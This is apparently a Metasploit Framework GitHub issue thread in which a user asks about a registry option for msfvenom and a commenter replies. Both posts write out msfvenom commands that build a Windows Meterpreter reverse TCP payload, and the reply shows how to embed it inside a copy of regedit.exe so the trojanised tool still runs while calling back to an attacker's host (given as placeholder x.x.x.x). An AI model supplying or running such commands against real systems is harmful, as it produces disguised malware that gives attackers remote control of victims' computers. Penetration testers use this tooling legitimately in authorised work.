### ISSUE TITLE
Question 1.1

### ISSUE THREAD

**Issue by GreenEYESSS** [rapid7/metasploit-framework#12050]
msfvenom have regedit or msfvenom REG=HKLM\Software\

like 
msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx REG=HKLM\Software\ -f exe > Regedit.exe

**Comment by void-in** [comment]
Not sure what you are trying to achive. If you want to embed the meterpreter in regedit.exe, you can use the -x flag along with -k.
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx -x <path of regedit.exe> -k -f exe -o reg_meter.exe
```
